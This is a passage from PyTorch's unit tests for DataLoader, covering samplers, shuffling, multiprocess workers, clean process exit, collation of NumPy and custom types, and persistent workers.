self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
def test_seqential_batch_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
def test_seqential_batch_workers_prefetch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# raise error when replacement=False and num_samples is not None
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=len(self.dataset)))
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=0))
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=True,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(int(math.ceil(float(num_samples) / batch_size)),
count_num_samples_in_data_loader)
def test_distributed_sampler_invalid_rank(self):
from torch.utils.data.distributed import DistributedSampler
dataset = torch.IntTensor(range(10))
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, 3)
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
from torch.utils.data.distributed import DistributedSampler
num_processes = 4
num_batches = 9
data_set = torch.IntTensor(range(num_batches))
scanned_data = torch.IntTensor([])
for i in range(num_processes):
s = DistributedSampler(data_set, num_processes, i)
d_loader = self._get_data_loader(data_set, batch_size=int(num_batches / num_processes), drop_last=True, sampler=s)
for data in d_loader:
scanned_data = torch.cat((scanned_data, data), 0)
self.assertEqual(scanned_data.size(), scanned_data.unique().size())
def test_sampler_reproducibility(self):
from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
for fn in (
lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
for sampler in (
RandomSampler(self.dataset, num_samples=5, replacement=True),
RandomSampler(self.dataset, replacement=False),
WeightedRandomSampler(weights, num_samples=5, replacement=True),
WeightedRandomSampler(weights, num_samples=5, replacement=False),
SubsetRandomSampler(range(10)),
):
torch.manual_seed(0)
l1 = list(sampler) + list(sampler)
torch.manual_seed(0)
l2 = list(sampler) + list(sampler)
self.assertEqual(l1, l2)
its = (iter(sampler), iter(sampler))
ls = ([], [])
for idx in range(len(sampler)):
for i in range(2):
if idx == 0:
torch.manual_seed(0)
ls[i].append(next(its[i]))
self.assertEqual(ls[0], ls[1])
def _test_sampler(self, **kwargs):
indices = range(2, 12) # using a regular iterable
dl = self._get_data_loader(self.dataset, sampler=indices, batch_size=2, **kwargs)
self.assertEqual(len(dl), 5)
for i, (input, _target) in enumerate(dl):
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[i * 2 + 2:i * 2 + 4])
def test_sampler(self):
self._test_sampler()
self._test_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = [] # using a regular iterable
for i in range(0, 20, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 8)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = self._get_data_loader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
from torch.utils.data._utils.worker import _generate_state
# Using NumPy generated states as the reference to test `_generate_state`
# having the same result.
# Test case: ((worker_id, base_seed), expected_state)
test_cases = [
((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
]
for (worker_id, base_seed), exp in test_cases:
self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
self._test_error(self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True))
def test_error_workers(self):
self._test_error(self._get_data_loader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
r"""Check that workers exit even if the iterator is not exhausted."""
if TEST_CUDA:
pin_memory_configs = (True, False)
else:
pin_memory_configs = (False,)
for pin_memory in pin_memory_configs:
loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
workers = loader._workers
if pin_memory:
pin_memory_thread = loader._pin_memory_thread
for i, _ in enumerate(loader):
if i == 10:
break
assert i == 10
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
if pin_memory:
pin_memory_thread.join(JOIN_TIMEOUT)
self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
(r'''There might be ConnectionResetError or leaked semaphore warning '''
r'''(due to dirty process exit), but they are all safe to ignore''')
# TODO: test the case where the pin_memory_thread triggers an
# error/fatal signal. I haven't found out how to properly do that.
for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
itertools.product([True, False], repeat=4):
# `hold_iter_reference` specifies whether we hold a reference to the
# iterator. This is interesting because Python3 error traces holds a
# reference to the frames, which hold references to all the local
# variables including the iterator, and then the iterator dtor may
# not be called before process end. It is important to see that the
# processes still exit in both cases.
if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
# For windows, pin_memory sometimes causes CUDA oom.
continue
# `exit_method` controls the way the loader process ends.
# - `*_kill` means that `*` is killed by OS.
# - `*_error` means that `*` raises an error.
# - `None` means that no error happens.
# In all cases, all processes should end properly.
if use_workers:
exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
persistent_workers = self.persistent_workers
else:
exit_methods = [None, 'loader_error', 'loader_kill']
persistent_workers = False
for exit_method in exit_methods:
if exit_method == 'worker_kill':
# FIXME: This sometimes hangs. See #16608.
continue
desc = []
desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
desc.append('use_workers={}'.format(use_workers))
desc.append('pin_memory={}'.format(pin_memory))
desc.append('hold_iter_reference={}'.format(hold_iter_reference))
desc.append('exit_method={}'.format(exit_method))
desc = 'test_proper_exit with ' + ', '.join(desc)
# Event that the loader process uses to signal testing process
# that various things are setup, including that the worker pids
# are specified in `worker_pids` array.
loader_setup_event = mp.Event()
# Event that this process has finished setting up, and the
# loader process can now proceed to trigger error events or
# finish normally.
tester_setup_event = mp.Event()
loader_p = ErrorTrackingProcess(target=_test_proper_exit,
args=(is_iterable_dataset, use_workers, pin_memory,
exit_method, hold_iter_reference,
loader_setup_event, tester_setup_event,
persistent_workers),
disable_stderr=False)
loader_p.start()
loader_psutil_p = psutil.Process(loader_p.pid)
# Wait for loader process to set everything up, e.g., starting
# workers.
loader_setup_event.wait(timeout=JOIN_TIMEOUT)
if not loader_setup_event.is_set():
fail_msg = desc + ': loader process failed to setup within given time'
if loader_p.exception is not None:
fail_msg += ', and had exception {}'.format(loader_p.exception)
elif not loader_p.is_alive():
fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
else:
fail_msg += ', and is still alive.'
if loader_p.is_alive():
# this may kill the process, needs to run after the above lines
loader_p.print_traces_of_all_threads()
self.fail(fail_msg)
# We are certain that the workers have started now.
worker_psutil_ps = loader_psutil_p.children()
def fail(reason):
report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
'memory_full_info', 'num_ctx_switches',
'open_files', 'threads', 'status',
'nice', 'ionice']
if reason is None:
err_msg = desc
else:
err_msg = '{}: {}'.format(desc, reason)
err_msg += '\nLoader info:\n\t'
if loader_psutil_p.is_running():
err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
loader_p.print_traces_of_all_threads()
else:
err_msg += 'exited with code {}'.format(loader_p.exitcode)
if use_workers:
err_msg += '\nWorker(s) info:'
for idx, worker_psutil_p in enumerate(worker_psutil_ps):
err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
if worker_psutil_p.is_running():
err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
print_traces_of_all_threads(worker_psutil_p.pid)
else:
err_msg += 'exited with unknown code'
self.fail(err_msg)
tester_setup_event.set()
try:
loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
if loader_p.is_alive():
fail_reason = 'loader process did not terminate'
if loader_p.exception is not None:
fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
else:
fail(fail_reason + ', and had no exception')
_, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
if len(alive) > 0:
fail('worker process (pid(s) {}) did not terminate'.format(
', '.join(str(p.pid) for p in alive)))
if exit_method is None:
if loader_p.exitcode != 0:
fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
else:
if loader_p.exitcode == 0:
fail('loader process had zero exitcode')
if exit_method == 'loader_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Loader error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_kill':
if isinstance(loader_p.exception, RuntimeError):
if 'DataLoader worker (pid' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif isinstance(loader_p.exception, ConnectionRefusedError):
# Sometimes, when the worker is being killed and is freeing its
# resources, the unpickling in loader process will be met an
# a `ConnectionRefusedError` as it can not open a socket to receive
# resource. In such cases, the worker may not have fully exited,
# and the loader can't know this via `is_alive` check or `SIGCHLD`
# handler. So we permit this as an allowed error as well.
# After all, we are happy as long as it terminates.
pass
else:
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Worker error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
finally:
loader_p.terminate()
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for _ in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
class IterableDataset(torch.utils.data.IterableDataset):
def __len__(self):
return 10
def __iter__(self):
return iter(range(10))
iterable_loader = DataLoader(IterableDataset(), batch_size=1)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=1, drop_last=True)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=2)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=2, drop_last=True)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=3)
self.assertEqual(len(iterable_loader), 4)
iterable_loader = DataLoader(IterableDataset(), batch_size=3, drop_last=True)
self.assertEqual(len(iterable_loader), 3)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = self._get_data_loader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
def test_default_convert_mapping_keep_type(self):
data = CustomDict({"a": 1, "b": 2})
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_keep_type(self):
data = CustomList([1, 2, 3])
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_dont_keep_type(self):
data = range(2)
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, [0, 1])
def test_default_collate_dtype(self):
arr = [1, 2, -1]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.int64)
arr = [1.1, 2.3, -0.9]
collated = _utils.collate.default_collate(arr)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.float64)
arr = [True, False]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.bool)
# Should be a no-op
arr = ['a', 'b', 'c']
self.assertEqual(arr, _utils.collate.default_collate(arr))
def test_default_collate_mapping_keep_type(self):
batch = [CustomDict({"a": 1, "b": 2}), CustomDict({"a": 3, "b": 4})]
collated = _utils.collate.default_collate(batch)
expected = CustomDict({"a": torch.tensor([1, 3]), "b": torch.tensor([2, 4])})
self.assertEqual(collated, expected)
def test_default_collate_sequence_keep_type(self):
batch = [CustomList([1, 2, 3]), CustomList([4, 5, 6])]
collated = _utils.collate.default_collate(batch)
expected = CustomList([
torch.tensor([1, 4]),
torch.tensor([2, 5]),
torch.tensor([3, 6]),
])
self.assertEqual(collated, expected)
def test_default_collate_sequence_dont_keep_type(self):
batch = [range(2), range(2)]
collated = _utils.collate.default_collate(batch)
self.assertEqual(collated, [torch.tensor([0, 0]), torch.tensor([1, 1])])
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
self.assertEqual(arr, _utils.collate.default_collate(arr))
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
import numpy as np
with tempfile.TemporaryFile() as f:
arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
arr_memmap = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
arr_memmap[:] = arr[:]
arr_new = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
tensor = _utils.collate.default_collate(list(arr_new))
self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
batch = [['X'], ['X', 'X']]
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch))
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch[::-1]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
import numpy as np
t_in = torch.zeros(1)
n_in = np.zeros(1)
self.assertEqual(t_in.is_shared(), False)
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)
# FIXME: fix the following hack that makes `default_collate` believe
# that it is in a worker process (since it tests
# `get_worker_info() != None`), even though it is not.
old = _utils.worker._worker_info
try:
_utils.worker._worker_info = 'x'
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
finally:
_utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
with self.assertWarnsRegex(
UserWarning,
r"excessive worker creation might get DataLoader running slow or even freeze"):
dataloader = DataLoader(self.dataset, batch_size=2, num_workers=1000)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2(TestCase):
@skipIfNoDill
def test_basics(self):
# TODO(VitalyFedyunin): This test will start breaking if we remove guaranteed order
# of traversing workers
dp = IterableWrapper(list(range(1000)))
dl = DataLoader(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2 = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2_threading = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2, parallelism_mode='thread')
self.assertEqual(list(dl), list(dl2))
self.assertEqual(list(dl), list(dl2_threading))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2_EventLoop(TestCase):
@skipIfNoDill
def test_basic_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
it = list(range(100))
numbers_dp = IterableWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(numbers_dp)
process.start()
local_datapipe = communication.iter.QueueWrapper(
communication.protocol.IterDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
clean_me(process, req_queue, res_queue)
self.assertEqual(list(range(100)), actual)
@skipIfNoDill
def test_basic_mapdatapipe_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
input_len = 100
it = list(range(input_len))
numbers_dp = SequenceWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(
numbers_dp)
process.start()
# Functional Test: Ensure that you can retrieve every element from the Queue and DataPipe
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
self.assertEqual([(x, x) for x in range(100)], actual)
# Functional Test: raise Error when input
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
with self.assertRaisesRegex(IndexError, "out of bound"):
local_datapipe[1000]
# __len__ Test: Ensure that the correct length is returned
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
self.assertEqual(input_len, len(local_datapipe))
clean_me(process, req_queue, res_queue)
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
def setUp(self):
super(TestStringDataLoader, self).setUp()
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for (s, n) in loader:
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.empty(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
def setUp(self):
super(TestDictDataLoader, self).setUp()
self.dataset = DictDataset()
def test_sequential_batch(self):
for persistent_workers in (False, True):
if persistent_workers:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers, num_workers=1)
else:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
class DummyDataset(torch.utils.data.Dataset):
def __init__(self):
self.data = list(range(10))
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# The persistent workers always maintain the original
# dataset through the dataloader lifetime
# so the attributes will remain the same as the
# first time the workers where spawned (dataloader iteration)
assert self.start == 0
return self.data[idx]
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN, "DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoaderPersistentWorkers(TestDataLoader):
def setUp(self):
super(TestDataLoaderPersistentWorkers, self).setUp()
self.persistent_workers = True
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1, persistent_workers=True):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_dataset_not_reset(self):
dataset = DummyDataset()
pin_memory_configs = [False]
if TEST_CUDA:
pin_memory_configs.append(True)
for pin_memory in pin_memory_configs:
dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
dataset.start = 0
for i in range(10):
for x in dataloader:
pass
# Changing the start value here doesn't have any effect in the dataset
# cached by the workers. since they are not recreated between epochs
# and can cache values safely
dataset.start = i
class NamedTupleDataset(Dataset):
from collections import namedtuple
Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
Data = namedtuple('Data', ['positive', 'negative'])
def __len__(self):
return 4
def __getitem__(self, ndx):
return self.Batch(data=self.Data(positive=ndx, negative=-ndx),
label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
def setUp(self):
super(TestNamedTupleDataLoader, self).setUp()
self.dataset = NamedTupleDataset()
def test_dataloader_with_namedtuple(self):
# auto-collation
loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertIsInstance(batch.data.positive, torch.Tensor)
self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
# no auto-collation
loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertNotIsInstance(batch.data.positive, torch.Tensor)
class SimpleCustomBatch(object):
def __init__(self, data):
transposed_data = list(zip(*data))
self.inp = torch.stack(transposed_data[0], 0)
self.tgt = torch.stack(transposed_data[1], 0)
def pin_memory(self):
